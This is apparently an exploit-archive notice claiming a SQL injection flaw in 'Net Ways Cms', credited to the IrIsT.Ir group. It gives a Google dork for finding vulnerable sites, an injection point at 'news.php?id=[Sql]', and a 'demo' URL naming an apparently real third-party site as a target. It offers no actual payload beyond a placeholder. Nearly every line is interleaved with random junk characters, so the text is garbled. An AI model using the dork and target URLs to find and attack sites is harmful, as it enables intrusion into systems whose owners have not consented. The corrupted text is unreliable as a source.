################################################################################??######## 8 m. G" L% l* L+ E. w% L) g1 _+ }
#
; W( y4 f% c+ Q# k2 r# Exploit Title : Net Ways Cms Sql Injection Vulnerability 0 W7 u7 U3 X2 ^3 R. i0 L
#
6 \4 M, t1 _+ @1 v1 J# Author : IrIsT.Ir
; d9 C. y7 R1 W$ p6 W7 W: f# ! h# S0 u) v7 e( V4 N4 u5 T$ X
# Discovered By : Am!r
9 l3 F# _0 F9 ^: R8 n1 J# 8 f: R n% k" _5 E- c( e, |
# Home : http://IrIsT.Ir/forum
1 X- ^; f8 j' A2 v O#
; } |* g5 y* |* ?# Software Link : http://www.netways.com/ www.political-security.com6 V* x) g" }0 A2 [+ a
#
4 g2 N: p% [4 Y. N# Security Risk : High
7 q- {' g1 e4 |$ @0 Y# u# : j. T. P- D7 m ^ L" Y
# Version : All Version ( T4 ~4 C* S, e* k! A
# ' ~8 Y9 }$ u1 G' k/ n) y! h
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
9 W( L- r }. {' U- N% P; }#
% z/ {; R0 I i D! {7 B6 G; I/ {- S# Dork : intext:"Designed & developed by NetWays"
1 x, Q* x" c, ], H#
. }% a0 g1 h7 C- s0 s/ X4 ~################################################################################??########
6 k% X1 O# m9 K- Y#
3 f' r9 y) |1 s9 c; n3 o% A7 v# Expl0iTs : * v$ _0 e7 C. C: T7 {
#
! z- o. M4 }) ^" H, a) x" X# http://target.com/news.php?id=[Sql]
# _! F) {+ w) j& ~: b0 b0 F9 o$ j# ) N, j3 D# c5 S% W8 A9 L3 c; w
#
0 W) s( x% w: ^( a6 ^ s# D3mo :
) g6 H+ T. X. c: T- N( |3 w. j#
/ h9 w, N2 r9 L& D' g# http://compagnieparento.com/news.php?id=7[Sql]
/ p/ @- W8 |! K# S# t#
5 w! H# x3 Y( e8 h: J################################################################################??######## 6 Q7 t2 n4 H: L; a* F+ Q
#
5 J; s; z8 z; |1 }# }! |5 y# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r 6 i$ A% I, g9 ?2 |
# 3 O2 e2 N( ]" K
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r # H: O1 t) }2 M! u
#
8 M" [$ L0 D- J) X/ x: F+ x# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
9 c# S( q. j% _$ o8 ~9 Z4 i; N4 k# , ]0 B4 `3 v* r- q" ~1 r' b
################################################################################??######## |